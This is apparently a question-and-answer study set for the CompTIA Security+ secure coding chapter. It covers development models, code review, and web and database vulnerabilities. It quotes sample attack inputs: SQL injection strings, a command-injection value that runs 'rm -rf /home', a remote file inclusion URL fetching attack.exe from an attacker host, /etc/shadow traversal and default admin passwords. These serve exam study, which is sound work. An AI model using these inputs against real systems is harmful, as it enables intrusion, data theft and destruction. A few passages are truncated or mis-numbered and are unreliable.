CompTIA Security+ SYO 601 Chapter 6 Secure Coding


Server-side request forgery (SSRF) attacks exploit a similar vulnerability to XSRF attacks, but instead of tricking a user's browser into visiting a URL, they trick a server into visiting?

A URL based on user-supplied input. SSRF attacks are possible when a web application accepts URLs from a user as input and then retrieves information from that URL. If the server has access to nonpublic URLs, an SSRF attack can unintentionally disclose that information to an attacker.

The SDLC is useful for organizations and for developers because it provides?

A consistent framework to structure workflow and to provide planning for the development process. Despite these advantages, simply picking an SDLC model to implement may not always be the best choice. Each SDLC model has certain types of work and projects that it fits better than others, making choosing an SDLC model that fits the work an important part of the process.

Credential-stealing attacks allow a hacker or penetration tester to authenticate directly to a service using?

A stolen account.

The time-of-check-to-time-of-use (TOCTTOU or TOC/TOU) issue is a race condition that occurs when a program checks?

Access permissions too far in advance of a resource request. For example, if an operating system builds a comprehensive list of access permissions for a user upon logon and then consults that list throughout the logon session, a TOCTTOU vulnerability exists. If the system administrator revokes a particular permission, that restriction would not be applied to the user until the next time they log on. If the user is logged on when the access revocation takes place, they will have access to the resource indefinitely. The user simply needs to leave the session open for days, and then the new restrictions will never be applied. To prevent this race condition, the developer should evaluate access permissions at the time of each request rather than caching a listing of permissions.

Penetration testers may assume that an administrator may not have changed the default password and try to use a variety of default passwords on applications and devices in an attempt to gain access. Some of the common username/password combinations to test are?

Administrator/password
Admin/password
Admin/admin

Reviewing the code that is written for an application provides a number of?

Advantages. It helps to share knowledge of the code, and the experience gained in writing is better than simple documentation alone would be since it provides a personal understanding of the code and its functions. It also helps detect problems while enforcing coding best practices and standards by exposing the code to reviews during its development cycle. Finally, it ensures that multiple members of a team are aware of what the code is supposed to do and how it accomplishes its task.

With code security, software developers should?

Also take steps to safeguard the creation, storage and delivery of their code. They do this through a variety of different techniques.

In addition to using the content returned by an application to assess susceptibility to blind SQL injection attacks, penetration testers may use the?

Amount of time required to process a query as a channel for retrieving information from a database. These attacks depend on delay mechanisms provided by different database platforms. For example, Microsoft SQL Server's Transact-SQL allows a user to specify a command that might look something like this:

WAITFOR DELAY '00:00:15'

This command would instruct the database to wait 15 seconds before performing the next action. An attacker seeking to verify whether an application is vulnerable to time-based attacks might provide the following input to the account ID field:

52019'; WAITFOR DELAY '00:00:15'; --

Cross-site scripting (XSS) attacks occur when web applications allow?

An attacker to perform HTML injection, inserting their own HTML code into a web page.

Session hijacking attacks take a different approach by stealing?

An existing authenticated session. These attacks don't require that the attacker gain access to the authentication mechanism; instead, they take over an already authenticated session with a website.

WAFs function similarly to network firewalls, but they work at the?

Application layer. A WAF sits in front of a web server and receives all network traffic headed to that server. It then scrutinizes the input headed to the application, performing input validation (whitelisting and/or blacklisting) before passing the input to the web server. This prevents malicious traffic from ever reaching the web server and acts as an important component of layered defense against web application vulnerabilities.

Web applications are complex ecosystems consisting of application code, web platforms, operating systems, databases, and interconnected?

Application programming interfaces (APIs). The complexity of these environments makes many different types of attacks possible and provides fertile ground for penetration testers. We've already looked at a variety of attacks against web applications, including injection attacks, session hijacking, directory traversal, and more. In the following sections, we round out our look at web-based exploits by exploring cross-site scripting, cross-site request forgery, and clickjacking.

Know how to implement application security controls?

Application security should be at the forefront of security operations principles. This includes protecting code through the use of input validation. Web applications that rely on cookies for session management should secure those cookies through the use of transport encryption. Code should be routinely subjected to code review as well as static and dynamic testing.

Applications that allow user input should perform?

Application validation of user input to reduce the likelihood that it contains an attack. Improper input handling practices can expose applications to injection attacks, cross-site scripting attacks, and other exploits.

Cybersecurity professionals and application developers have several tools at their disposal to help protect against?

Application vulnerabilities. The most important of these is input validation.

A multitude of development styles, languages, frameworks, and other variables may be involved in the creation of an?

Application, but many of the security issues are the same regardless of which you use. In fact, despite many development frameworks and languages providing security features, the same security problems continue to appear in applications all the time! Fortunately, a number of common best practices are available that you can use to help ensure software security for your organization.

Attackers use a technique called blind SQL injection to conduct an?

Attack even when they don't have the ability to view the results directly.

APIs that are not intended for public use should always be secured with an?

Authentication mechanism such as an API key, and accessed only over encrypted channels that protect those credentials from eavesdropping attacks.

API security relies on?

Authentication, authorization, proper data scoping to ensure that too much data isn't released, rate limiting, input filtering, and appropriate monitoring and logging to remain secure. Of course, securing the underlying systems, configuring the API endpoint server or service, and providing normal network layer security to protect the service is also important. Many security tools and servers provide APIs, and security professionals are often asked to write scripts or programs that can access an API to pull data.

Since continuous integration relies on an automated build process, it also requires?

Automated testing. It is often paired with continuous deployment (CD) (sometimes called continuous delivery), which rolls out tested changes into production automatically as soon as they have been tested.

Security professionals seek to avoid single points of failure in their environments to avoid?

Availability risks if an issue arises with a single component. This is also true for software development. Security professionals should watch for places in their organization that are dependent on a single piece of source code, binary executable file, or compiler. Though it may not be possible to eliminate all of these dependencies, tracking them is a critical part of maintaining a secure codebase.

There are also a number of common code review processes, including?

Both formal and Agile processes like pair programming, over-the-shoulder, and Fagan code reviews.

Injection vulnerabilities are among the primary mechanisms that attackers use to?

Break through a web application and gain access to the systems supporting that application. These vulnerabilities allow an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute.

The source code that is the basis of every application and program can contain a variety of?

Bugs and flaws, from programming and syntax errors to problems with business logic, error handling, and integration with other services and systems. It is important to be able to analyze the code and understand what the code does, how it performs that task, and where flaws may occur in the program itself. This is often done via static or dynamic code analysis along with testing methods like fuzzing. Once changes are made to code and it is deployed, it must be regression tested to ensure that the fixes put in place did not create new security issues!

Secure applications depend on secure databases to provide the content and transaction processing necessary to support?

Business operations. Relational databases form the core of most modern applications, and securing these databases goes beyond just protecting them against SQL injection attacks. Cybersecurity professionals should have a strong understanding of secure database administration practices.

Buffer overflow attacks are quite commonplace and tend to persist for many years after they are initially discovered. For example, the 2016 Verizon Data Breach Investigations Report identified 10 vulnerabilities that were responsible for 85% of the compromises in their study. Among the top 10 were four overflow issues. What were they?

CVE-1999-1058: Buffer overflow in Vermillion FTP Daemon.
CVE-2001-0876: Buffer overflow in Universal Plug and Play (UPnP) on Windows 98, 98SE, ME, and XP.
CVE-2002-0126: Buffer overflow in Black Moon FTP Server 1.0 through 1.5.
CVE-2003-0818: Multiple integer overflows in Microsoft's ASN.1 library.

The four-digit number following the letters CVE in each vulnerability title indicates the year that the vulnerability was discovered. In a study of breaches that took place in 2015, four of the top 10 issues causing breaches were exploits of overflow vulnerabilities that were between 12 and 16 years old. Verizon hasn't included this type of analysis in their more recent reports, but there's no reason to believe that this trend has changed.

In most pair programming environments, the developers are expected to?

Change roles frequently, allowing both of them to spend time thinking about the code while at the keyboard and to think about the design and any issues while reviewing it.

Application programming interfaces (APIs) are interfaces between?

Clients and servers or applications and operating systems that define how the client should ask for information from the server and how the server will respond. This definition means that programs written in any language can implement the API and make requests.

SQL injection attacks are a specific example of a general class of attacks known as?

Code injection attacks. These attacks seek to insert attacker-written code into the legitimate code created by a web application developer. Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack. Similar attacks take place against other environments. For example, attackers might embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query, conducting an LDAP injection attack. They might also attempt to embed code in Extensible Markup Language (XML) documents, conducting an XML injection attack. Commands may even attempt to load dynamically linked libraries (DLLs) containing malicious code in a DLL injection attack. In addition to SQL injection, cross-site scripting is an example of a code injection attack that inserts HTML code written by an attacker into the web pages created by a developer.

Code repositories are an important part of application security but are only one aspect of?

Code management. Cybersecurity teams should also work hand in hand with developers and operations teams to ensure that applications are provisioned and deprovisioned in a secure manner through the organization's approved release management process. This process should include code integrity measurement. Code integrity measurement uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved. Any deviation in hash values indicates that code was modified either intentionally or unintentionally, and requires further investigation prior to release.

Explain secure code deployment and automation concepts?

Code repositories serve as version control mechanisms and a centralized authority for the secure provisioning and deprovisioning of code. Developers and operations teams should work together on developing automated courses of action as they implement a DevOps approach to creating and deploying software. Software applications should be designed to support both scalability and elasticity.

Code signing provides developers with a way to confirm the authenticity of their?

Code to end users. Developers use a cryptographic function to digitally sign their code with their own private key and then browsers can use the developer's public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals. In cases where there is a lack of code signing, users may inadvertently run inauthentic code.

Dynamic code analysis relies on execution of the?

Code while providing it with input to test the software. Much like static code analysis, dynamic code analysis may be done via automated tools or manually, but there is a strong preference for automated testing due to the volume of tests that need to be conducted in most dynamic code testing processes.

Attackers thrive on exploiting errors in?

Code.

No matter how talented the development team for an application is, there will be some form of flaws in?

Code. Veracode's 2019 metrics for applications based on their testing showed that 83 percent of the applications they scanned exhibited at least one security issue during the testing process. That number points to a massive need for software security testing to continue to be better integrated into the development life cycle.

In some cases, application code may reach back to the operating system to execute a?

Command. This is especially dangerous because an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system. An example is an application that sets up a new student account for a course. Among other actions, it creates a directory on the server for the student. On a Linux system, the application might use a system() call to send the directory creation command to the underlying operating system. For example, if someone fills in the text box with:

mchapple

the application might use a function call like

system('mkdir /home/students/mchapple')

to create a home directory for that user. An attacker examining this application might guess that this is how the application works and then supply this input:

mchapple & rm -rf /home

which the application then uses to create the system call:

system('mkdir /home/students/mchapple & rm -rf /home')

This sequence of commands deletes the /home directory along with all files and subfolders it contains. The ampersand in this command indicates that the operating system should execute the text after the ampersand as a separate command. This allows the attacker to execute the rm command by exploiting an input field that is only intended to execute a mkdir command.

There are many ways that an attacker may learn a user's password, ranging from technical to social. Here are just a few of the possible ways that an attacker might discover a user's password. What are those ways?

Conducting social engineering attacks that trick the user into revealing a password, either directly or through a false authentication mechanism.
Eavesdropping on unencrypted network traffic.
Obtaining a dump of passwords from previously compromised sites and assuming that a significant proportion of users reuse their passwords from that site on other sites.

In addition to these approaches, attackers may be able to conduct credential brute-forcing attacks, in which they obtain a set of weakly hashed passwords from a target system and then conduct an exhaustive search to crack those passwords and obtain access to the system. In some cases, application developers, vendors, and system administrators make it easy for an attacker. Systems often ship with default administrative accounts that may remain unchanged. For example, a section of the manual for a Zyxel router includes a default username and password as well as instructions for changing that password.

DevOps and DevSecOps are often combined with?

Continuous integration and continuous deployment methodologies, where they can rely on automated security testing, and integrated security tooling, including scanning, updates, and configuration management tools, to help ensure security.

Using continuous integration and continuous deployment methods requires building?

Continuous validation and automated security testing into the pipeline testing process. It can result in new vulnerabilities being deployed into production and could allow an untrusted or rogue developer to insert flaws into code that is deployed and then remove the code as part of a deployment in the next cycle. This means that logging, reporting, and continuous monitoring must all be designed to fit the CI/CD process.

Most websites that require authentication manage user sessions using?

Cookies managed in the user's browser and transmitted as part of the HTTP header information provided by a website. In an example, the user accesses the website's login form and uses their credentials to authenticate. If the user passes the authentication process, the website provides the user's browser with a cookie that may be used to authenticate future requests. Once the user has a valid cookie stored in the browser, the browser transmits that cookie with all future requests made to the website. The website inspects the cookie and determines that the user has already authenticated and does not need to reenter their password or complete other authentication tasks.

Pair programming adds additional?

Cost to development since it requires two full-time developers. At the same time, it provides additional opportunities for review and analysis of the code and directly applies more experience to coding problems, potentially increasing the quality of the code.

Organizations often want other developers to build upon platforms that they have?

Created. For example, Twitter and Facebook might want to allow third-party application developers to create apps that post content to the user's social media feeds. To enable this type of innovation, services often create application programming interfaces (APIs) that enable automated access.

Request forgery attacks come in two forms. What are they?

Cross-site request forgery.
Server-side request forgery.

Maintaining sensitive personal information in databases exposes an organization to risk in the event that information is stolen by an attacker. Database administrators should take measures to protect against data exposure. What are some of the measures that they should take?

Data minimization: It is the best defense. Organizations should not collect sensitive information that they don't need and should dispose of any sensitive information that they do collect as soon as it is no longer needed for a legitimate business purpose. Data minimization reduces risk because you can't lose control of information that you don't have in the first place!

Tokenization: It replaces personal identifiers that might directly reveal an individual's identity with a unique identifier using a lookup table. For example, we might replace a widely known value, such as a student ID, with a randomly generated 10-digit number. We'd then maintain a lookup table that allows us to convert those back to student IDs if we need to determine someone's identity. Of course, if you use this approach, you need to keep the lookup table secure.

Hashing: Uses a cryptographic hash function to replace sensitive identifiers with an irreversible alternative identifier. Salting these values with a random number prior to hashing them makes these hashed values resistant to a type of attack known as a rainbow table attack.

In some cases, web developers design an application to directly retrieve information from a?

Database based on an argument provided by the user in either a query string or a POST request. For example, this string might be used to retrieve a document from a document management system:

http://www.mycompany.com/getDocument.php?documentID=1842

There is nothing wrong with this approach, as long as the application also implements other authorization mechanisms.

Web applications often receive input from users and use it to compose a?

Database query that provides results that are sent back to a user. For example, consider the search function on an e-commerce site. If a user enters orange tiger pillow into the search box, the web server needs to know what products in the catalog might match the search term. It might send a request that looks something like this:

SELECT ItemName, ItemDescription, ItemPrice FROM Products WHERE ItemName LIKE '%orange%' AND ItemName LIKE '%tiger%' AND ItemName LIKE '%pillow%'

The command above retrieves a list of items that can be included in the results returned to the end user.

Know how to implement database security controls?

Databases often store an organization's most sensitive information, and database security controls should be put in place that protect that information adequately. This begins with the use of normalized database designs and continues with the use of stored procedures to interact with databases. Sensitive information stored in databases should be protected through the use of data minimization, data tokenization, and a combination of salting and hashing.

Code repositories also help avoid the problem of?

Dead code where code is in use in an organization but nobody is responsible for the maintenance of that code and, in fact, nobody may even know where the original source file resides.

Passwords are the most common form of authentication in use today, but unfortunately, they are also the most easily?

Defeated. The reason for that is that passwords are a knowledge-based authentication technique. An attacker who learns a user's password may then impersonate the user from that point forward until the password expires or is changed.

OWASP provides a regularly updated list of proactive controls that is useful to review not only as a set of useful best practices, but also as a way to see how web application security threats change from year to year. Here are OWASP's top proactive controls from 2018 with brief descriptions. Which are they?

Define Security Requirements: Implement security throughout the development process.
Leverage Security Frameworks and Libraries: Preexisting security capabilities can make securing applications easier.
Secure Database Access: Prebuild SQL queries to prevent injection and configure databases for secure access.
Encode and Escape Data: Remove special characters.
Validate All Inputs: Treat user input as untrusted and filter appropriately.
Implement Digital Identity: Use multifactor authentication, secure password storage and recovery, and session handling.
Enforce Access Controls: Require all requests to go through access control checks, deny by default, and apply the principle of least privilege.
Protect Data Everywhere: Use encryption in transit and at rest.
Implement Security Logging and Monitoring: This helps detect problems and allows investigation after the fact.
Handle All Errors and Exceptions: Errors should not provide sensitive data, and applications should be tested to ensure that they handle problems gracefully.

The SDLC can be approached in many ways, and over time a number of formal models have been created to help provide a common framework for development. Formal SDLC models can be very?

Detailed, with specific practices, procedures, and documentation, but many organizations choose the elements of one or more models that best fit their organizational style, workflow, and requirements.

The term DevSecOps describes security as part of the?

DevOps model. In this model, security is a shared responsibility that is part of the entire development and operations cycle. That means integrating security into the design, development, testing, and operational work done to produce applications and services.

Pair programming is an Agile software?

Development technique that places two developers at one workstation. One developer writes code, while the other developer reviews their code as they write it. This is intended to provide real-time code review, and it ensures that multiple developers are familiar with the code that is written.

Pointers are a commonly used concept in application?

Development. They are simply an area of memory that stores an address of another location in memory. For example, we might have a pointer called photo that contains the address of a location in memory where a photo is stored.

In Linux operating systems, the .. operator in a file path refers to the directory one level higher than the current?

Directory. For example, the path /var/www/html/../ refers to the directory that is one level higher than the html directory, or /var/www/. Directory traversal attacks use this knowledge and attempt to navigate up through the directory hierarchy. If you use the /var/www/html directory as your starting point, the first .. operator brings you to /var/www, the second brings you to /var, and the third brings you to the root directory, /. The remainder of the URL brings you down into the /etc/ directory and to the location of the /etc/shadow file.

One way that attackers may use a fake driver is by refactoring an existing?

Driver. If they have access to the driver's source code, they can modify it to also include malware elements. This is very difficult to pull off in practice, however, because it's not easy to get access to the source code for drivers.

Cookies work the same way. They're just digital versions of badges. If an attacker is able to steal someone's cookie, they may then impersonate that user to the website that issued the cookie. There are several ways that an attacker might obtain a cookie. What are those ways?

Eavesdropping on unencrypted network connections and stealing a copy of the cookie as it is transmitted between the user and the website.
Installing malware on the user's browser that retrieves cookies and transmits them back to the attacker.
Engaging in a man-in-the-middle attack, where the attacker fools the user into thinking that the attacker is actually the target website and presents a fake authentication form. They may then authenticate to the website on the user's behalf and obtain the cookie.

The Agile methodology is based on 12 principles. What are they?

Ensure customer satisfaction via early and continuous delivery of the software.
Welcome changing requirements, even late in the development process.
Deliver working software frequently (in weeks rather than months).
Ensure daily cooperation between developers and business people.
Projects should be built around motivated individuals who get the support, trust, and environment they need to succeed.
Face-to-face conversations are the most efficient way to convey information inside the development team.
Progress is measured by having working software.
Development should be done at a sustainable pace that can be maintained on an ongoing basis.
Pay continuous attention to technical excellence and good design.
Simplicity, the art of maximizing the amount of work not done, is essential.
The best architectures, requirements, and designs emerge from self-organizing teams.
Teams should reflect on how to become more effective and then implement that behavior at regular intervals.

These principles drive an SDLC process that is less formally structured than Spiral or Waterfall but that has many opportunities for customer feedback and revision. It can react more nimbly to problems and will typically allow faster customer feedback, an advantage when security issues are discovered.

Organizations may also introduce third-party code into their?

Environments when they outsource code development to other organizations. Security teams should ensure that outsourced code is subjected to the same level of testing as internally developed code.

Insecure URL redirects are another vulnerability that attackers may?

Exploit in an attempt to steal user sessions. Some web applications allow the browser to pass destination URLs to the application and then redirect the user to that URL at the completion of their transaction. For example, an ordering page might use URLs with this structure:

https://www.mycompany.com/ordering.php?redirect=http%3a//www.mycompany.com/thankyou.htm

When attackers discover a file inclusion vulnerability, they often?

Exploit it to upload a web shell on the server. Web shells allow the attacker to execute commands on the server and view the results in the browser. This approach provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection by security tools. In addition, the attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team who might then be tipped off to the successful attack.

In some cases, developers may include usernames and passwords in their source code. There are two variations on this error. What are they?

First, the developer may create a hard-coded maintenance account for that application that allows the developer to regain access even if the authentication system fails. This is known as a backdoor vulnerability and is problematic because it allows anyone who knows the backdoor password to bypass normal authentication and gain access to the system. If the backdoor becomes publicly (or privately!) known, all copies of the code in production are compromised. The second variation of hard-coding credentials occurs when developers include access credentials for other services within their source code. If that code is en outsiders. This occurs quite often when developers accidentally publish code to a public code repository, such as GitHub, that contains API keys or other hard-coded credentials.

The Spiral model also provides greater?

Flexibility to handle changes in requirements as well as external influences such as availability of customer feedback and development staff. It also allows the software development life cycle to start earlier in the process than Waterfall does. Because Spiral revisits its process, it is possible for this model to result in rework or to identify design requirements later in the process that require a significant design change due to more detailed requirements coming to light.

Software development does not always follow a?

Formal model, but most enterprise development for major applications does follow most, if not all, of these phases. In some cases, developers may even use elements of an SDLC model without realizing it!

Attackers often seek to undermine the security of those authentication systems, because, if they are able to do so, they might?

Gain illegitimate access to systems, services, and information protected by that authentication infrastructure.

Device drivers play an important role in computing. They serve as the software interface between?

Hardware devices and the operating system. Device drivers are the reason that you can use almost any printer from a wide variety of manufacturers with Windows or any other operating system. Microsoft does not need to design Windows to work with every printer on the market. Instead, it provides manufacturers with the ability to write Windows drivers for their products. When a manufacturer builds a new printer, they design a driver that provides Windows with instructions on how to interact with the printer.

An attacker seeking to conduct a cross-site scripting attack could try to insert?

HTML script code. When future users load this message or code, they would then see the alert pop-up. This is fairly innocuous, but an XSS attack could also be used to redirect users to a phishing site, request sensitive information, or perform another attack.

Agile is rooted in the Manifesto for Agile Software Development, a document that has four basic premises. What are these four premises?

Individuals and interactions are more important than processes and tools. Working software is preferable to comprehensive documentation. Customer collaboration replaces contract negotiation. Responding to change is key, rather than following a plan.

Input validation techniques are the go-to standard for protecting against?

Injection attacks. However, it's important to understand that attackers have historically discovered ways to bypass almost every form of security control. Parameter pollution is one technique that attackers have successfully used to defeat input validation controls.

Parametrized queries offer another technique to protect applications against?

Injection attacks. In a parametrized query, the client does not directly send SQL code to the database server. Instead, the client sends arguments to the server, which then inserts those arguments into a precompiled query template. This approach protects against injection attacks and also improves database performance. Stored procedures are an example of an implementation of parametrized queries used by some database platforms.

In the basic SQL injection attack, the attacker is able to provide?

Input to the web application and then monitor the output of that application to see the result. Though that is the ideal situation for an attacker, many web applications with SQL injection flaws do not provide the attacker with a means to directly view the results of the attack. However, that does not mean that the attack is impossible; it simply makes it more difficult.

The most effective form of input validation uses?

Input whitelisting, in which the developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers. For example, if an input form prompts a user to enter their age, input whitelisting could verify that the user supplied an integer value within the range 0-120. The application would then reject any values outside that range.

Cross-site scripting attacks often exploit reflected?

Input, but this is not the only way that these attacks might take place. Another common technique is to store cross-site scripting code on a remote web server in an approach known as stored XSS. These attacks are described as persistent, because they remain on the server even when the attacker is not actively waging an attack.

Fuzz testing, or fuzzing, involves sending?

Invalid or random data to an application to test its ability to handle unexpected data. The application is monitored to determine if it crashes, fails, or responds in an incorrect manner.

Memory pointers can also cause security?

Issues.

DevOps combines software development and?

IT operations, with the goal of optimizing the SDLC. This is done by using collections of tools called toolchains to improve the coding, building and testing, packaging, release, configuration and configuration management, and monitoring elements of a software development life cycle.

DevOps should have what?

It should have security baked into it as well.

Fuzzing is typically automated due to the?

Large amount of data that a fuzz test involves, and it is particularly useful for detecting input validation and logic issues as well as memory leaks and error handling problems. Unfortunately, fuzzing tends to only identify simple problems—it does not account for complex logic or business process issues, and it may not provide complete code coverage if its progress is not monitored.

File inclusion attacks take directory traversal to the next?

Level. Instead of simply retrieving a file from the local operating system and displaying it to the attacker, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing arbitrary code.

File inclusion attacks come in two variants; what are they?

Local file inclusion attacks seek to execute code stored in a file located elsewhere on the web server. They work in a manner very similar to a directory traversal attack. For example, an attacker might use the following URL to execute a file named attack.exe that is stored in the C:\www\uploads directory on a Windows server: http://www.mycompany.com/app.php?include=C:\\www\\uploads\\attack.exe
Remote file inclusion attacks allow the attacker to go a step further and execute code that is stored on a remote server. These attacks are especially dangerous because the attacker can directly control the code being executed without having to first store a file on the local server. For example, an attacker might use this URL to execute a file stored on a remote server: http://muycompany.com/app.php?include=http://evil.atttacker.com/attack.exe

XSRF attacks work by making the reasonable assumption that users are often?

Logged into many different websites at the same time. Attackers then embed code in one website that sends a command to a second website. When the user clicks the link on the first site, they are unknowingly sending a command to the second site. If the user happens to be logged into that second site, the command may succeed. Consider, for example, an online banking site. An attacker who wants to steal funds from user accounts might go to an online forum and post a message containing a link. That link goes directly to the money transfer site and issues a command to transfer funds to the attacker's account. The attacker then leaves the link posted on the forum and waits for an unsuspecting user to come along and click the link. If the user happens to be logged into the banking site, the transfer succeeds.

Once an attacker has a cookie, they may try to perform a cookie?

Manipulation to alter the details sent back to the website or simply use the cookie as the badge required to gain access to the site. This is known as a session replay attack.

Pass-around code review, sometimes known as email pass-around code review, is a form of?

Manual peer review done by sending completed code to reviewers who check the code for issues.

Waterfall has been replaced in?

Many organizations because it is seen as relatively inflexible, but it remains in use for complex systems. Since Waterfall is not highly responsive to changes and does not account for internal iterative work, it is typically recommended for development efforts that involve a fixed scope and a known timeframe for delivery and that are using a stable, well-understood technology platform.

If an application requests memory from the operating system, it eventually no longer needs that?

Memory and should then return the memory to the operating system for other uses. A memory leak occurs when the application fails to return memory that it no longer needs, perhaps by simply losing track of an object that it has written to a reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all the memory available to the system, causing it to crash. Rebooting the system often resets the problem, returning the memory to other uses, but if the memory leak isn't corrected the cycle simply begins anew.

Applications are often responsible for managing their own use of?

Memory, and in those cases, poor memory management practices can undermine the security of the entire system.

The software development life cycle (SDLC) describes the steps in a?

Model for software development throughout its life. It maps software creation from an idea to requirements gathering and analysis to design, coding, testing, and rollout. Once software is in production, it includes user training, maintenance, and decommissioning at the end of the software package's useful life.

It is often difficult to perform input whitelisting because of the?

Nature of many fields that allow user input. For example, imagine a classified ad application that allows users to input the description of a product that they wish to list for sale. It would be difficult to write logical rules that describe all valid submissions to that field that would prevent the insertion of malicious code. In this case, developers might use input blacklisting to control user input. With this approach, developers do not try to explicitly describe acceptable input but instead describe potentially malicious input that must be blocked. For example, developers might restrict the use of HTML tags or SQL commands in user input.

The Waterfall methodology is a sequential model in which each phase is followed by the?

Next phase. Phases do not overlap, and each logically leads to the next.

If an application tries to de-reference a null pointer, it causes a condition known as a?

Null pointer exception. In the best case, a null pointer exception causes the program to crash, providing an attacker with access to debugging information that may be used for reconnaissance of the application's security. In the worst case, a null pointer exception may allow an attacker to bypass security controls. Security professionals should work with application developers to help them avoid these issues.

One of the best resources for secure coding practices is the?

Open Web Application Security Project (OWASP). OWASP is the home of a broad community of developers and security practitioners, and it hosts many community-developed standards, guides, and best practice documents, as well as a multitude of open-source tools.

Device drivers require low-level access to the?

Operating system and run with admin privileges. If an attacker can convince a user to install a malicious driver on their computer, that malware can gain complete control of the system.

The NTLM pass-the-hash attack is another form of a replay attack that takes place against the?

Operating system rather than a web application. The attacker begins by gaining access to a Windows system and then harvests stored NTLM password hashes from that system. They can then attempt to use these hashes to gain user or administrator access to that system or other systems in the same Active Directory domain.

Participating in the SDLC as a security professional provides significant?

Opportunities to improve the security of applications. The first chance to help with software security is in the requirements gathering and design phases, when security can be built in as part of the requirements and then designed in based on those requirements. Later, during the development process, secure coding techniques, code review, and testing can improve the quality and security of the code that is developed. During the testing phase, fully integrated software can be tested using tools like web application security scanners or penetration testing techniques. This also provides the foundation for ongoing security operations by building the baseline for future security scans and regression testing during patching and updates. Throughout these steps, it helps to understand the common security issues that developers face, create, and discover.

In a SQL injection attack, the attacker might send a very unusual-looking request to the web server, perhaps a search that looks something like this?

Orange tiger pillow' ; SELECT CustomerName, CreditCardNumber FROM Orders; --

Software, ranging from customer-facing applications and services to smaller programs, down to the smallest custom scripts written to support business needs, is everywhere in our?

Organizations.

Security professionals should be familiar with the various ways that third-party code is used in their?

Organizations as well as the ways that their organization makes services available to others. It's fairly common for security flaws to arise in shared code, making it extremely important to know these dependencies and remain vigilant about security updates.

Over-the-shoulder code review also relies on a?

Pair of developers, but rather than requiring constant interaction and hand-offs, over-the-shoulder requires the developer who wrote the code to explain the code to the other developer. This approach allows peer review of the code and can also assist developers in understanding how the code works, without the relatively high cost of pair programming.

Cybersecurity analysts discovering a buffer overflow vulnerability during a vulnerability scan should seek out a?

Patch that corrects the issue. In most cases, the scan report will directly identify an available patch.

The Spiral method uses four phases, which it repeatedly visits throughout the development life cycle; what are they?

Phase 1: Identification, or requirements gathering, which initially gathers business requirements, system requirements, and more detailed requirements for subsystems or modules as the process continues.
Phase 2: Design, covering conceptual, architectural, logical, and sometimes physical or final design.
Phase 3: Build, which produces an initial proof of concept and then further develops releases until the final production build is produced.
Phase 4: Evaluation, which involves risk analysis for the development project intended to monitor the feasibility of delivering the software from a technical and managerial viewpoint. As the development cycle continues, this phase also involves customer testing and feedback to ensure customer acceptance.

A typical Waterfall process includes six phases; what are they?

Phase 1: Requirements are gathered and documented.
Phase 2: Analysis is performed to build business rules and models.
Phase 3: A software architecture is designed.
Phase 4: Coding and integration testing of the software occur.
Phase 5: Once the software is complete, testing and debugging are completed.
Phase 6: The software enters an operational phase, with support, maintenance, and other operational activities happening on an ongoing basis.

If you are used to the Waterfall or Spiral development processes, Agile is a significant departure from?

The planning, design, and documentation-centric approaches that Agile's predecessors use. Agile methods tend to break up work into smaller units, allowing work to be done more quickly and with less up-front planning. Agile focuses on adapting to needs rather than predicting them, with major milestones identified early in the process but subject to change as the project continues to develop.

The Fagan inspection process has six phases; what are they?

Planning, including preparation of materials, attendees, and location.
Overview, which prepares the team by reviewing the materials and assigning roles such as coder, reviewer, and moderator.
Preparation, in which participants review the code or other item being inspected and document any issues or questions they may have.
Meeting, to identify defects based on the notes from the preparation phase.
Follow-up by the moderator to ensure that all issues identified have been found and that no new defects were created during the resolution process.

When an application needs to access the actual photo, it performs an operation called?

Pointer de-referencing. This simply means that the application follows the pointer and accesses the memory referenced by the pointer address. There's nothing unusual about this process; applications do it all the time.

Continuous integration (CI) is a development?

Practice that checks code into a shared repository on a consistent ongoing basis. In CI environments, this can range from a few times a day to a very frequent process of check-ins and automated builds. The main goal of the approach is to enable the use of automation and scripting to implement automated courses of action that result in continuous delivery of code.

There's an active and healthy debate in the database community about how closely database designers should follow the normal forms. Some of the advantages of implementing these principles as much as practical include that normalized designs do the following; what are they?

Prevent data inconsistency. Prevent update anomalies. Reduce the need for restructuring existing databases. Make the database schema more informative.

Database normalization is a set of design?

Principles that database designers should follow when building and modifying databases. Databases that follow these principles are said to be in normal forms, which are numbered in increasing order of the level of principle followed. The simplest normal form is the first normal form (1NF), and more advanced normal forms follow sequentially (2NF, 3NF, and so on).

Agile software development is an iterative and incremental?

Process, rather than the linear process that Waterfall and Spiral use.

Unlike many other methods, static analysis does not run the?

Program; instead, it focuses on understanding how the program is written and what the code is intended to do. Static code analysis can be conducted using automated tools or manually by reviewing the code—a process sometimes called "code understanding." Automated static code analysis can be very effective at finding known issues, and manual static code analysis helps to identify programmer-induced errors.

An application is still responsible for ensuring that the user is?

Properly authenticated and is authorized to access the requested document. The reason for this is that an attacker can easily view this URL and then modify it to attempt to retrieve other documents, as in these examples: https://mycompany.com/getDocument.php?docmentID=1841 https://mycompany.com/getDocument.php?docmentID=1843 https://mycompany.com/getDocument.php?docmentID=1843 If the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority. This situation is known as an insecure direct object reference.

XSS attacks occur when an application allows?

Reflected input. When the web application "reflects" this input in the form of a web page, your browser processes it as it would any other web page: it displays the text portions of the web page and executes the script portions. In this case, the script simply opens a pop-up window that says "hello" in it. However, you could be more malicious and include a more sophisticated script that asks the user to provide a password and then transmits it to a malicious third party. At this point you're probably asking yourself how anyone would fall victim to this type of attack. After all, you're not going to attack yourself by embedding scripts in the input that you provide to a web application that performs reflection. The key to this attack is that it's possible to embed form input in a link.

Developers must understand and write their code so that it is?

Resilient to unexpected situations that an attacker might create in order to test the boundaries of code. For example, if a web form requests an age as input, it's insufficient to simply verify that the age is an integer. Attackers might enter a 50,000 digit integer in that field in an attempt to perform an integer overflow attack.

Memory leaks are one example of?

Resource exhaustion.

